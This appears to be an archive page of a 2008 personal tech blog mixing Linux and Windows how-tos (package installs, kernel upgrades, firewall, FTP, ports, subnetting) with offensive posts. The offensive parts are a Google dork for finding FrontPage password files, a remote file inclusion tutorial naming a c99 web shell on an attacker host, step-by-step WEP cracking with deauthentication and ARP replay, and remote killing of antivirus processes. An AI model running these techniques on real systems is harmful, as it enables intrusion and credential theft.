Tuesday, July 29, 2008

Install Frozen Bubble in Ubuntu / Kubuntu


Frozen Bubble v2.1.0

Colorful 3D rendered penguin animations, 100 levels of 1p game, hours and hours of 2p game, nights and nights of 2p/3p/4p/5p game over LAN or Internet, a level-editor, 3 professional quality digital soundtracks, 15 stereo sound effects, 8 unique graphical transition effects, 8 unique logo eye-candies.

More than ever, you really need this game.

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.




Install with Terminal Cammand :

apt-get install frozen-bubble

Or You can Download From Original Frozen Bubble Web Site.

Monitor & Closed Open Port

Last Mouth im posting about........ Opened port by trojan.........
and this time i give to You how to closed open port....
u Must have Tools to monitor and open active port.. and i found good software to monitor and Closed port.. the software name is [ ACTIVE PORT ]



Active Ports - easy to use tool for Windows NT/2000/XP that enables you to monitor all open TCP/IP and UDP ports on the local computer. Active Ports maps ports to the owning application so you can watch which process has opened which port. It also displays a local and remote IP address for each connection and allows you to terminate the owning process. Active Ports can help you to detect trojans and other malicious programs.

Download Active Port

Windows XP ToolBox

This a very old article based on my tiny document “WinDOS tools” which was for a short while on Blackcode, before it was shutdown… It was an article to impres my friends, but found some usefull stuff two when writing it… so let’s take a look at some “hidden” Windows XP programs…

  • MAC Address (getmac)

It seems that Windows has a miny tool usefull in finding out our mac address… So type getmac and your MAC(’s) address(es) will appear in the console.

  • Net BIOS Status (Nbtstat)

Another information tool, probably you have heard about it when reading some old documentation about Windows hacking… For it to work there should be installed the NetBeUI protocol, type nbtstat to get the full cmd line parameters.

  • CAB Packer (makecab, extrac32)

Theres a small packing tool available under Windows, by the help of which you can compress any files, giving more often a better compresion… here is an example how to use this functionality:

makecab file.exe
extrac32 file.ex_

  • Finger

Not much to say about this program, because many of you have heard about it, just type it in the console and get all available options.

  • FTP

Windows has a simple file transfer protocol client, for those of you who don’t have installed Windows Commander, or work remotely on a computer and can not use your browser to download the file on the specific host.

  • Message (msg)
It does what is supposed to do, it sends messages to the specific host on your network, but there could be some configurations on your network which wouldn’t allow you to do it… anyway here is an example of use:

msg username-of-targeted-host /SERVER:hostname and here your message

  • Shares
If you are in a local network on which you often copy files from other shared folders on your network, than this will prove for you to be a big relief, because this way you could shortcut all the shares for faster access…

C:\>net view \\hostname

Shared resources at \\hostname

Share name Type Used as Comment
--------------------------------------------------------
DOWNLOAD Disk

C:\>net use Z: \\hostname\DOWNLOAD

--if no error then from this point you can access the share the following way:

C:\>Z:
Z:\>

  • Network status (netstat)

If you don’t have a firewall, or you just want to see all your network connections currently in use of listening, then you the command netstat (-a) and will print you all the info mentioned above.

  • Path Ping (pathping)

This little program is a hybrid between traceroute and ping, so as you might have guessed it not only pings the specific host, but also shows the route the data packet uses to reach it’s destination.

  • Remote TaskKill (tskill)

Yes you can kill processes on your network, only if the network is not well configured (seen it a couple of times). By this you could shutdown an antivirus program, a firewall, the explorer process (this sometimes may crash Windows), or any other program run by the specific hostname. The command is tskill, for example you could do something like this (which would close Internet Explorer):

tskill iexplore /server:target-hostname /a /v

  • Telnet
I mention this one because you do not have always to download PuTTY, just for a telnet/irc/smtp/etc. connection, you could use the Windows incorpored telnet program; of course is not as good as PuTTY, but it will do…

Thursday, July 24, 2008

Google hacking

Google hacking is a term that refers to the art of creating complex search engine queries in order to filter through large amounts of search results for information related to computer security. In its malicious format it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities as well as locate private, sensitive information about others, such as credit card numbers, social security numbers, and passwords. This filtering is performed by using advanced Google operators [1], [2]. While Google was the original tool of the Google hackers, many of the tactics and operators can be used on other search engines, such as MSN Search and Yahoo.

Google Hacking involves using Google operators to locate specific strings of text within search results. Some of the more popular examples are using Google to find specific versions of vulnerable Web applications. The following search query would locate all web pages that have that particular text contained within them. It is normal for default installations of applications to include their running version in every page they serve, e.g. "Powered by XOOPS 2.2.3 Final"

The following search query will locate all websites that have the words "admbook" and "version" in the title of the website. It also checks to ensure that the web page being accessed is a PHP file.

Another technique is searching for insecure coding practices in the public code indexed by Google Code Search or other source code search engines.

One can even retrieve the Username & Password list from Microsoft FrontPage Servers by inputing the given microscript in Google search field: -

"#-Frontpage-" inurl:administrators.pwd

Devices connected to the Internet can be found. A search string such as inurl:"ViewerFrame?Mode=" will find public web cameras.

Google Hack Key Words :


Alternative Inputs :

Basic Remote File Inclusion

Definition
Remote file inclusion, commonly known as RFI is a form of attack where the attacker trys to inject there own php code inside your php app's. If an attacker can successfully achieve this they will be able to execute any code they wish on your webserver.

What is RFI?

Small Definition: RFI, (R)emote (F)ile (I)inclusion, is a small but deadly vulnerability found in a major part of the web today. It allows one to (include) (remote) (files).

Example
Lets say we have a website that is coded in php, the website uses something like page=page.html to work out which page should be displayed. The code for this might look like

Code:


What this means is that what ever is passed down to page will get included inside this php page. This means that an attacker can simply do something like this

Code:




If we take a look at what is happening on the code side of things once this has been done we can see that the actual code that the web server is executing looks like this

Code:



As you can see the attacker has just managed to get his code executed on your webserver.

Behind The Scenes
So why can an attacker do this? Well the simple answer is because the include() function (note, this kind of attack isnt only open to the include function, require_once() will also work) allows you to link to remote files, the problem with this is that an attacker can take advantage of that feature, like you just seen. You might be wondering why the script that the attacker includes is a .txt and not a .php. The answer to this is that if the script was a .php and the attackers server had php installed then the script will get executed on the attackers server and not the target. We also add the ? at the end so we can remove anything that might be inside the include() function on the target server, take this script for example

Code:




What the above script does is add .php to anything that is passed into it. So if we passed it http://www.attackersserver.com/c99.txt then what we are actually going to see in the include() function is http://www.attackersserver.com/c99.txt.php this is bad. What this means is that we wont actually get our script executed as it doesnt exist now. So if we pass the ? on the end of the script we are going to treat the .php as if it is a var that is getting passed to the script. So now the include() function looks like http://www.attackersserver.com/c99.txt?.php and it will still get executed.

Conclusion
There you have it a basic tutorial on what remote file inclusion is and how/why an attacker can use it against your servers. This kind of attack, just like most attacks isnt that hard to stop if you dont trust all data that is coming into you. All you have to really remember is if the data isnt hard coded then you need to check it to make sure it does what it is meant to do. Alot of the attacks that are preformed can be stoped by a few simple checks on the data.

Monday, July 21, 2008

Cracking WEP Key With Aircrack-ng


BackTrack is the most Top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.

It's evolved from the merge of the two wide spread distributions - Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack has gained massive popularity and was voted in 2006 as the #1 Security Live Distribution by insecure.org. Security professionals as well as new comers are using BackTrack as their favorite toolset all over the globe.

BackTrack has a long history and was based on many different linux distributions until it is now based on a Slackware linux distribution and the corresponding live-CD scripts by Tomas M. (www.slax.org) . Every package, kernel configuration and script is optimized to be used by security penetration testers. Patches and automation have been added, applied or developed to provide a neat and ready-to-go environment.

After coming into a stable development procedure during the last releases and consolidating feedbacks and addition, the team was focused to support more and newer hardware as well as provide more flexibility and modularity by restructuring the build and maintenance processes. With the current version, most applications are built as individual modules which help to speed up the maintenance releases and fixes.

Because Metasploit is one of the key tools for most analysts it is tightly integrated into BackTrack and both projects collaborate together to always provide an on-the-edge implementation of Metasploit within the BackTrack CD-Rom images or the upcoming remote-exploit.org distributed and maintained virtualization images (like VMWare images appliances).

Being superior while staying easy to use is key to a good security live cd. We took things a step further and aligned BackTrack to penetration testing methodologies and assessment frameworks (ISSAF and OSSTMM). This will help our professional users during their daily reporting nightmares.

Currently BackTrack consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals. This structure allows even newcomers to find the related tools to a certain task to be accomplished. New technologies and testing techniques are merged into BackTrack as soon as possible to keep it up-to-date From : Remote-Exploit


Equipment :
1. Laptop Acer 4315 [ Pinjem ama Shinta.... Thanks shinta :) ]
2. Usb Linksys 45gc [ rausb0 ]
3. Cd Backtrack 2

Fist you Must Login : Root
Password : toor
and : startx

1. and open the Terminal with command :

airodump-ng --channel 10 -w hasil rausb0


This Screen Shot From Dumping the Channel


2. And Open another Terminal :

aireplay-ng --arpreplay -h 00:15:6d:A6:75:71 -b 00:02:6f:47:f3:f6 rausb0


3. Open Terminal Make A Paket Data :

aireplay-ng --deauth 10 -c 00:15:6d:A6:75:71 -a 00:02:6f:47:f3:f6 rausb0



Screen Shot From Make a Paket Data


4. Cracking the wep:

aircrak-ng hasil.cap

or with aircrack-ptw : /aircrack-ptw hasil.cap


Screen Shot From Cracking WEP Key with aircrack-ptw

5. Finish... Found key with len 13: 5D 33 BF 7C B1 EF 22 A5 5D 39 E4 46 9F

- More Info : Instal Backtrack on USB | Wireless Card Driver Compability With Backtrack | Laptop Compability With Backtrack

Thursday, July 10, 2008

The Shell

"What Is a Shell?"

Think of the shell as Super-Dooper DOS. You enter a command, the shell checks it out, then the kernel does the rest.

Most Linux distributions use bash as the default shell. There are many others. Two of the most popular being pdksh and tcsh (pronounced tea-shell). This manual only covers the bash shell since the purpose of this manual is to get you using Linux as quick as possible. When you become confident with Linux, finding out about the other shells is a piece-of-cake.

"Why Is It Called a Shell?"

The shell's job is to interpret the commands and run the programs you request. Linux is a multi-tasking OS (meaning you can run multiple programs). Linux was also designed to be a multi-user OS, meaning it can run multiple shells. Each user is allocated his/her own shell at login. As a user, you have access only to the programs you're running, not the ones others are running. The programs are kept separate because they are "enclosed" in a "shell".

The Kernel (The Heart of an OS)

All operating systems have a kernel. The kernel is the heart, the life-blood, the core of an operating system. Everything else is just there to make the operating system worth using. The kernel provides low-level services, such as memory management, basic hardware interaction, networking, and security.

The Linux kernel version numbering system works as follows:
z.y.x

z = Major version (we've had 0, 1, and 2 so far)
y = Minor version
x = Revision level

Development of the Linux kernel uses a 'two-tree' system. There's the development tree and the stable tree. If y is an odd number, it's the development tree. If y is even, it's the stable tree.

At the time of writing, 2.3.28 is the latest development kernel and 2.2.13 is the latest stable kernel.

When Linus (the kernel's creator) decides the 2.3 kernel is ready to become the next stable tree, the 2.3 tree will become the 2.4 tree, and work will commence on the 2.5 tree.

All new (and therfore experimental) features enter the development tree -- making parts of the development kernel unstable and unsecure. For this reason only kernel developers, the instatiably curious, and those that desperately require some feature only available in the development tree should go near it.

If the change to the development kernel is a bug fix and the bug is also in the stable kernel, then after some testing the fix will also be made to the stable kernel.

Suffice to say, Linux distributions never use a development kernel.

The 2.0.x series was officially discontinued as of June 1999, and we'll soon start to see Linux distributions featuring the eagerly awaited 2.4 kernel (approx. Feb. 2000).

Setting-up an Internet Connection On Ubuntu

- 1 -

Logged-in to your guest account, enter:
startx

...to start X.

- 2 -

Open a terminal and enter:
su -c "control-panel"

...followed by the root password when prompted.

- 3 -

In the control-panel select the "Network Configuration" button to bring up the "Network Configurator" window.

- 4 -

In the "Nameservers" box, enter your ISP's Primary DNS IP address e.g. 194.126.82.5. If you don't know yours then ask your ISP.

- 5 -

Select the "Interfaces" button and then select the "Add" button to open the "Choose Interface Type" window.

- 6 -

It's very likely that you'll be using the default of "PPP", so unless you know otherwise, just press "OK" to bring up the "Create PPP Interface" window.

- 7 -

In the "Create PPP Interface" window, enter the dial-up phone number, your PPP login name and your PPP password.

Note:

A few ISPs use an encrypted form of password transmission called PAP (Password Authentication Protocol). If yours is one of these, select "Use PAP authentication".

- 8 -

Select the "Customize" button to bring up an "Edit PPP Interface" window.

- 9 -

Select "Allow any user to (de)activate interface" to allow users other than root to connect and disconnect from the Internet.

Note:

A red indented box next to an option, indicates that the option is on. A grey box indicates that the option is off.

- 10 -

Select the "Networking" button, and switch off "Restart PPP when connection fails". It's extremely frustrating when you disconnect and it keeps reconnecting!

- 11 -

Finish by selecting the "Done" button, then select the "Save" button in the new window that appears.

- 12 -

Back in the "Network Configurator" window, select the "Save" button and then the "Quit" button.

- 13 -

At the control-panel again, select "Modem Configuration", select the device your modem is attached to, and finish by selecting the "Ok" button.

- 14 -

Finally, close the control-panel to terminate the su -c "control-panel" command you entered way back at step 2, thus returning you from the root account, back to the guest account.

Dialing Up

- 1 -

Either enter:
usernet

...in an X terminal window, or select "AnotherLevel menus" > "Networking" > "Usernet".

- 2 -

Select the "ppp0" button to connect, and then again when you wish to disconnect.

I Still Can't Get on the Net!


ISPs all require different details to dial-up. I use Global which is a big ISP here in Britain. A lot of people have e-mailed me telling me this guide doesn't get them on the Net. If you are one of those poor souls, then all I can say is that hopefully this guide has steered you in the right direction and that hopefully a phone-call or e-mail to your ISP will fill in the missing blanks.

The Dreaded WinModem

Unfortunately, some internal modems require a rather large driver called Windows! They are referred to as WinModems and companies that produce them to save a few cents, are crooks... allegedly. :) One notable example is the US Robotics WinModem series. If you have a WinModem you're not getting on the Net, simple as that. Although I've heard that the 2.4.x kernel will provide support for WinModems. (To what extent, I don't know.)

Upgrading Your Kernel

Dispelling The Mysticism


Much mysticism has been built around the difficulty of upgrading your Linux kernel. Truth is, it's not that difficult.

Note:

You'll need to be logged on as root whilst performing all of the following steps.

- 1 -

Download/move a kernel source file (e.g. linux-2.2.13.tar.gz) to your /usr/src directory.

- 2 -

Enter:
cd /usr/src

- 3 -

Enter:
rm linux

...to remove the symbolic link named linux.

- 4 -

Enter:
tar xzf linux-2.2.13.tar.gz

...(changing linux-2.2.13.tar.gz to the name of your kernel source file), to extract the compressed and archived source code files.

- 5 -

You'll now have a new directory called linux. 'cd' into it, by entering:
cd linux

- 6 -

It's now time to configure everything to your liking -- prior to actually building the kernel image. Newbies will likely find the graphical configuration utility friendlier that the console version, so in X, enter:

make xconfig

Note:

For those who prefer to do things at the console, enter: make menuconfig instead.

- 7 -

Now I know all this looks pretty scary, but the online help is excellent, and you'll soon have the hang of it. Just select the first option on the list, "Code maturity level options", and select the "Help" button to the right for help on that particular option. When you're finished with "Code maturity level options", select the "Next" button to move onto the next set of options... and so on.

When you're finished, select the "Save and Exit" button.

Note:

The reason many options are greyed out is because they rely on another option being selected.

- 8 -

Now enter each of the following in turn:
make dep
(Ensures everything gets built in the right order.)

make clean
(Cleans out information from previous compiles.)

make bzImage
(Creates the new kernel image.)

make modules
(Creates the new kernel modules.)

make module_install
(Installs modules to /lib/modules/kernel.version.number)

Tip:

Show-offs could have entered:

make dep; make clean; make bzImage; make modules; make modules_install

...instead (i.e. all on one line), whilst gooroos would have an alias to run this one big line, just by entering something suitably cryptic, like: mk

- 9 -

As long as it's a x86 PC your using, enter:
mv /usr/src/linux/arch/i386/boot/bzImage /boot/vmlinuz-2.2.13

...(if not, then replace the i386 part (determined by listing /usr/src/linux/arch)). Feel free to replace the vmlinuz-2.2.13 part with whatever filename you want.

- 10 -

Now you need to tell Lilo about the kernel image so that it can boot it. Enter:
pico /etc/lilo.conf

...and enter the following at the end of the file:
image=/boot/vmlinuz-2.2.13
label=newlinux
read-only
root=/dev/hda6

...making sure to change the vmlinuz-2.2.13 part to whatever you called the kernel image in step 10, and the hda6 part to wherever your root (/) partition is located (easy to determine since the other root= entry in this file will tell you). The newlinux part is what you enter at Lilo's boot: prompt to boot this particular kernel image. Change it to whatever you want. Now save the file and exit Pico.

- 11 -

Enter:
lilo

...to update Lilo with its new configuration.

- 12 -

Reboot your computer to test out the new kernel. If it doesn't work -- don't panic. You still have your old kernel to fall back on.

Forgot Your root Password?

Breaking Into Your Own System

- 1 -

When the LILO: prompt appears (or boot: prompt if you inserted a boot disk), enter:
linux -s

...or:
linux single

- 2 -

When the bash# prompt appears, enter:
passwd

...which will then prompt you for a new root password, without asking for the old one!

- 3 -

Press Ctrl+D and startup Linux proper, and log-in to the root account with your new password!

Ok, So How Do I Disable This!

Ok so now you're asking how do I prevent other people doing this (your pesky little brother perhaps?). Simple:

- 1 -

Go into BIOS. (Your BIOS frontend may differ from mine, but whilst steps 2 & 3 might not be exact instructions for you, they will be very similar.)

- 2 -

Select the option "BIOS FEATURES SETUP" and change "Boot Sequence" from "A, C, SCSI" to "C only", to prevent people getting past LILO with a Linux boot disk.

- 3 -

If you haven't password protected BIOS in the past then you've been very silly. Do so now by selecting "SUPERVISORY PASSWORD" from the main menu. Obviously this will prevent people changing the boot sequence back to "A, C, SCSI".

- 4 -

Now boot into Linux, open Linuxconf and password protect LILO to prevent others from using the dreaded "linux -s".

Think Your Safe Now?

Think you're computer's safe now? Well do you punk? Wrong answer. People can still pop your CMOS battery (a.k.a. "the big shiny circle thing on your motherboard") to erase your BIOS password (handy if you ever forget yours!). Solution? My full tower has a bit for a padlock at the back to stop people opening the case, but it's likely your's hasn't. Short of hiding your Linux boot disk, and installing a lock on your door, there's nothing you can do. Although saying that, it's unlikely a mischievious friend, college, partner or sibling is going to go to the trouble of popping the CMOS battery behind your back, and therefore wise to take the above precautions.

RPM at the Terminal

RPM

RPM (Red Hat Package Manager) is both a filetype (*.rpm) and the application that installs RPMs. One popular piece of software for installing, upgrading, and uninstalling RPMs in X is 'Gnome RPM', but we'll be dealing with how to do it from the terminal.

RPM filenames are made up as follows:
name-version-release.architecture.rpm

...e.g.:

tree-1.2-6.i386.rpm

Installing An RPM

Enter:
rpm -ivh tree-1.2-6.i386.rpm

...(replacing tree-1.2-6.i386.rpm with filename.)

i = install
v = verbose -- to tell you if install was successful (optional)
h = display hash marks to indicate progress (optional)

Note:
If the RPM is on your Red Hat CD, enter:

mount /mnt/cdrom
cd /mnt/cdrom/RedHat/RPMS
ls | less (to find filename of RPM (q to quit))
...then rpm -ivh filename to install.

Upgrading An RPM

Enter:

rpm -Uvh filename

Note:

You can actually install a package by 'upgrading' it, even if there's no previous version to upgrade.

Uninstalling An RPM

Enter:

rpm -e name

Note:

When uninstalling you give the name (e.g. tree) and not the package name (e.g. tree-1.2-6.i386.rpm).

Security and Firewall Basics

Overview

There are four ‘pillars’ in Information Security:
Authentication: To verify somebody’s / something’s identity
Access Control: To restrict access to valuable resources
Confidentiality: To ensure the privacy of data
Integrity: To prevent unauthorised changes to data.
Various technologies offer one or more of these for various aspects of IT. Examples of technologies that offer some of these pillars are encryption, physical access-control, biometrics, proxies, PKI and firewalls.
A firewall offers authentication (limited) and access control for IP.
There are three kinds of firewall:
A screening router blocks packet by looking at fields in the packet header.
A proxy firewall offers a virtual service for the server it’s protecting.
A session firewall intercepts the TCP connection to the server it’s protecting.
When exercising access control a screening router can only look at the packet headers (Source IP, Source Port, Destination IP, Destination Port, protocol type and flags). These headers carry limited information and can easily be changed. This can be a major limitation of screening routers in certain environments.
One enhancement of the screening router is stateful inspection. A stateful firewall keeps track of permitted connections in a dynamic state table. A good example of this technology is Firewall-1 from Checkpoint Software. Stateful inspection is more intelligent then standard screening and allows one to effectively handle complex protocols like FTP.
NAT (Network Address Translation) is another (limited) example of a stateful technology. NAT dynamically changes the source and destination addresses in the packet header as it forwards the packet. Thus the packet always seems to be coming from or going to the firewall while on the Internet. On the protected side of the firewall the packet has it’s standard headers, as created by the hosts themselves. NAT hides the architecture of the protected network and allows one to use experimental IP addresses on the protected network. Experimental address may not be routed on the Internet.
Key concepts

NAT: Network Address Translation



Important commands

Firewall commands vary from firewall to firewall. Basic screening technology is available as a standard application on most UNIX systems:

Linux: ipchains

BSD: ipfw

ipfw (BSD)

Use ipfw –l to view the configured screening rules on a hosting running ipwf.

(You must be root to do this)


ipchains (Linux)

Use ipchains –L to view the configured screening rules on a hosting running ipchains.

(You must be root to do this)


man (Unix)

Use man to view the help files for any standard Unix command.



Tips and tricks

Use man ipfw or man ipchains to view the help files for these applications.
Remember that a screening router must consider packets traveling in both directions. Screening technology is not aware of a session or a connection.
You can monitor the SYN flag and the ACK flag to determine if a packet is the first in a new connection, or part of an already established connection. If the SYN flag is set but the ACK flag is not then the packet is establishing a connection.
You can search for this condition using the –y flag (in ipchains) or the established flag in ipfw.
E.g. to allow all packets that are part of an already established connection:

ipchains -A input -p tcp ! -y -j ACCEPT (ipchains)
allow tcp from any to any established (ipfw)
Remember that the source port is not a valid way of doing authentication for IP because the host can select the source port for a connection.
0oooo0oooo0

ipconfig (Windows NT / Windows 98)

Use ipconfig /all to see the complete IP configuration and the MAC address for any device.


winipcfg (Windows 95)

Use winipcfg to see the complete IP configuration and the MAC address for any device.



ifconfig (UNIX)

Use ifconfig -au to see the complete IP configuration and the MAC address for all devices on the host.



netstat (UNIX and Windows)

Use netstat –rn to view the routing tables for the host.

route (Windows)

Use route print to view the routing tables for a Windows host.


route (Windows)

Use route add mask to add a new route to the routing table. You can also use default instead of
and .

Use route delete to delete a route from the routing table.

(You must be Administrator to do this)


route (Unix)

Use route add [-net | -host] destination gateway

Use route delete to delete a route from the routing table

(You must be root to do this)



ARP (UNIX and Windows)

Use arp –a to display all the MAC addresses a host has in its ARP tables.

Use arp –d [address] to delete a MAC address from the table.



ping (UNIX and Windows)

Use ping ping a host and see its IP address.



traceroute (UNIX)

Use traceroute to ‘trace’ the route a packet follows from the local host to a remote host.

Use traceroute –n to do a traceroute without doing a DNS lookup for every host in the path.



tracert (Windows)

Use tracert to ‘trace’ the route a packet follows from the local host to a remote host.

Use tracert –d to do a traceroute without doing a DNS lookup for every host in the path.



Tips and tricks

The default route is also referred to as 0.0.0.0/0 or 0.0.0.0:0.0.0.0.
Remember that routes are directional. This means that if you have routes from A to B, you still need routes from B to A to transfer data.
If you can ping from A to B then all the routes are correct (A to be and B to A).
Routing works on a next-hop basis. The next-hop must be in the same subnet as one of the router’s own devices.
You can use ipconfig / ifconfig / winipcfg to see what the IP address and mask is configured for each device on the host.
On Ethernet, a router will always have an entry for the next-hop in its ARP tables. If router B is not in the ARP tables of router A, then B cannot be a next-hop for A. The same goes for the default route, or default gateway on a router or on a host.
You can use traceroute (tracert) to monitor the path a packet follows to its destination. The address shown is always the address of the device nearest to the source.

FTP

Overview

FTP is an application protocol used to exchange files between computers on the Internet.
FTP uses TCP to establish a session between the client and the server.
FTP always establishes two TCP connections:
The first is the control connection. This connection is made from a random port on the client to port 21 on the server. The FTP commands and error messages are sent over this connection.
The 2nd connection is the data connection. The data connection can be made in two different modes: active mode and passive mode. The way the data connection is established for each of these two modes is different (more later). All FTP data, including file downloads and directory listings, is sent along this connection.
The FTP data connection can work in two ways: active mode and passive mode. In most FTP client applications, passive mode is default:
In passive mode the TCP connection is made from the server to the client. In this case the source port (on the server) is 20 and the destination port (on the client) to the same port on the client machine as was used for the control connection. That’s the theory. In practice most current FTP clients do not behave that way: A new connection is used for each transfer; to avoid running afoul of TCP's TIMEWAIT state, the client picks a new port number each time and sends a PORT command announcing that to the server
In active mode the TCP connection is established from a random high port on the client to a random high port on the server.
When random ports are used for connections, e.g. for the passive mode data connection, then the ports are communicated using the FTP port command. This command is issued in the background without the intervention of the user.
FTP can transmit files either as binary data or as ASCII data.
Key concepts



FTP: File Transfer Protocol


Important commands

netstat (UNIX and Windows)
Use netstat -an to see what sockets are defined on a host. A socket can either be LISTENING or ESTABLISHED.

ftp (UNIX and Windows)

use ftp to establish an FTP connection to a server.

Basic FTP commands are:

bye: quit
cd: change directory
close: close the connection
delete: delete a file
dir: directory listing
get: fetch specified file
lcd: local change directory (on the client)
mdir: make a directory
mget: get multiple files
mput: send multiple files
put: send specified file
pwd: present working directory
rename: duh.
rmdir: remove specified directory


Tips and tricks

The Microsoft Windows command-line FTP client can’t properly do passive FTP. Some other FTP clients are
WS_FTP (http://www.ipswitch.com)
CuteFTP (http://www.cuteftp.com)
FTP Explorer (http://www.winsite.com)
FTP Voyager (http://www.ftpvoyager.com/)
For an excellent description of the FTP commands, see the Windows help for "FTP utility".
To FTP to a server that is not listening on the standard port (21): First open the FTP utility ("ftp [enter]") then use the open command with the IP address and port ("open [enter]"). You have to do this to FTP to a NetSeq unit, which listens on port 821.
The NetSeq firewall uses a process called seepkt_ftp to monitor the FTP control connection for the port command. It can then read the parameters (IP address and port number) from the port command dynamically change it’s packet filter rule set based on this information. This is how the reverse connection for passive mode FTP is handled.
When transferring files between two different operating systems, always use a binary transfer. This eliminates the ASCII encoding formats on the hosts is different. To do a binary transfer, type "bin [enter]" before doing the put or the get.
While using the DOS ftp client, you can execute commands on the local machine by placing "!" before the command. E.g. "!dir" will give you a directory listing on the client machine.

Ports and Applications

Overview

Ports are the way a client program specifies a particular server program (service) on a host.
Higher-level applications that use TCP/IP, such HTTP, have ports with pre-assigned numbers. These are known as "well-known ports" and have been assigned by the Internet Assigned Numbers Authority (IANA).
Other application processes are given port numbers dynamically for each connection.
When a service (server program) initially is started, it is said to bind to its designated port number. A client program wants to use that service, connects to that port on the server.
Key concepts


Well-known ports are:

FTP data: 20 File Transfer Protocol

FTP control 21

telnet: 23

SMTP (mail): 25 Simple Mail Transfer Protocol

DNS (UPD & TCP): 53 Domain Name Service

HTTP: 80 Hypertext Transfer Protocol

POP3: 110 Post Office Protocol version 3

IMAP: 143 Internet Message Access Protocol

SNMP (UPD & TCP): 160/161 Simple Network Management Protocol

HTTPS: 443 Secure HTTP (using SSL)

NSFTP data: 820 NetSeq FTP

NSFTP control: 821

SQUID proxy: 3128 UnixHTTP proxy server

netstat (UNIX and Windows)

Use netstat -an to see what sockets are defined on a host. A socket can either be LISTENING or ESTABLISHED.



Tips and tricks
You can search for specific port numbers or IP numbers using find (under Windows) or grep (under Unix). E.g.:
D:\>netstat -an |find "139"
TCP 160.124.19.99:139 0.0.0.0:0 LISTENING

TCP 160.124.19.99:139 160.124.19.100:1069 ESTABLISHED

TCP 160.124.19.99:1180 160.124.19.98:139 ESTABLISHED

TCP 160.124.19.99:1186 160.124.19.98:139 ESTABLISHED

TCP 160.124.19.99:3015 160.124.19.98:139 ESTABLISHED

/etc/mail# netstat -an |grep 23

tcp4 160.124.19.98.2884 196.35.241.75.23 ESTABLISHED

tcp4 160.124.19.98.23 160.124.19.99.3589 ESTABLISHED

tcp4 160.124.19.98.2305 196.25.210.248.80 FIN_WAIT_2

tcp4 *.23 *.* LISTEN

If a TCP socket is defined for a specific port number, then you should be able to telnet to that port on the host. E.g.
/etc/mail# telnet 160.124.19.99 139
Trying 160.124.19.99...

Connected to gridcraft.

Escape character is '^]'.

If you use a MS client, the IP address or name of the server will appear at the top of the window if a connection is established:

Install an RPM Package on Ubuntu Linux

Installing software on Ubuntu usually entails using Synaptic or by using an apt-get command from the terminal. Unfortunately, there are still a number of packages out there that are only distributed in RPM format.

There's a utility called Alien that converts packages from one format to the other. This doesn't always mean that an rpm will work on your system, though. You will need to install some prerequisite software packages in order to install alien, however. These packages include gcc and make.

Run this command to install alien and other necessary packages:

sudo apt-get install alien dpkg-dev debhelper build-essential

To convert a package from rpm to debian format, use this command syntax. The sudo may not be necessary, but we'll include it just in case.

sudo alien packagename.rpm

To install the package, you'll use the dpkg utility, which is the internal package management tool behind debian and Ubuntu.

sudo dpkg -i packagename.deb

The package should now be installed, providing it's compatible with your system.

Net Command

NET USER - allows for password management and creation of local users.

net user bill hat /add
user bill cat

The example above creates a user called bill with the password of "hat".
The next line changes the password to cat.

I often use this to regularly change all local "administrator" account to a unique value across all workstations.

NET Localgroup - is used to create/delete local groups as well as add/remove members.

net localgroup flames /add
net localgroup flames fog,madness /add
net localgroup flames

The example above creates the group called clowns and adds the members bozo and clairabelle to the group clowns. Finally, it lists all the members of the group.

I often use this to add/remove various DOMAIN groups to/from the local administrators group as the desktop administrator for a group of computer changes.

NET START/STOP service - This command is used to start/stop a service or retreive a list of all running services.

net start (This will list all running services)
net stop workstation (This stops the workstation service)
net start workstation (This restarts the workstaion service)

This is useful when a service has a file locked that needs updating. Simply stop the service, update the file, and restart the service. Sometimes I also redirect the output of the "net start" command to a text file and search that result to see if a required service, such as an anti-virus package, is running. Below is a sample batch file to perform such a task.

net start c:\list.txt
find "Requiredservice" c:\list.txt
if errorlevel=0 goto end
fixit.bat
:end

Tuesday, July 8, 2008

IP addresses and subnet masking

Overview
An IP address is actually a 32 bit binary number, consisting of 4 x 8bit octets.
The IP address indicates both the subnet to which a host belongs, and the host address within that subnet.
The subnet mask (or netmask) indicates the distinction between the host part and the network part of the address.
The netmask is also a 32 bit binary number. It lines up with the 32bit address and indicates the network part with 1’s and the host part with 0’s
The mask can also be written as a decimal number using 4 x 8it octets. For e.g. a mask of 255.255.255.0 indicates that the host is in a class [C] network. Thus:
11111111 = 255 (1 host), 11111100 = 252 (4 IPs), 11111000 = 248 (8 IPs), 11110000 = 240 (16 IPs), 11100000 = 224 (32 IPs), 11000000 = 192 (64 IPs), 100000000 = 128 (128 IPs) and 00000000 = 0 (255 IPs).
In every IP subnet there one IP is reserved for the network address and one IP is reserved for the broadcast address (all IPs in that subnet). Thus, the number of possible hosts in a subnet is equal the number IPs less 2.
The description of a network lies completely in the IP configuration (address and mask) of the individual hosts. A host will believe itself to be in a particular network based completely on its own address and subnet mask, irrespective of the physical location of the other hosts in that network. Thus, for example, it is possible to have two IP subnets on a single Ethernet network without the one subnet being aware of the other.
Key concepts





Class A: addresses are for large networks with many devices.

Class B: addresses are for medium-sized networks.

Class C: addresses are for small networks (fewer than 256 hosts). Class D: addresses are multicast addresses.



Important commands





ipconfig (Windows NT / Windows 98)

Use ipconfig /all to see the complete IP configuration and the MAC address for any device.


winipcfg (Windows 95)

Use winipcfg to see the complete IP configuration and the MAC address for any device.


ifconfig (UNIX)

Use ifconfig -au to see the complete IP configuration and the MAC address for all devices on the host.

Use ifconfig
netmask to change the IP address of a device in real time.

NOTE: these changes are not permanent.


ping (UNIX and Windows)

Use ping to determine whether a host with a given IP address is active somewhere on the Internet.



Tips and tricks
When dividing a network into subnets, start by dividing in two, then again etc….
To determine how many IP addresses in a given subnet (e.g. 255.255.255.240), subtract the last octet (240) from 256 (e.g. 256-240 = 16). Because two addresses are always used (network and broadcast) subtract another 2 to get the maximum number of hosts (e.g. 16-2 = 14 hosts).
Use Microsoft Calculator (calc.exe) to convert a number from decimal to binary and visa-versa.
See http://www.whatis.com/subnet.htm for a very good description.

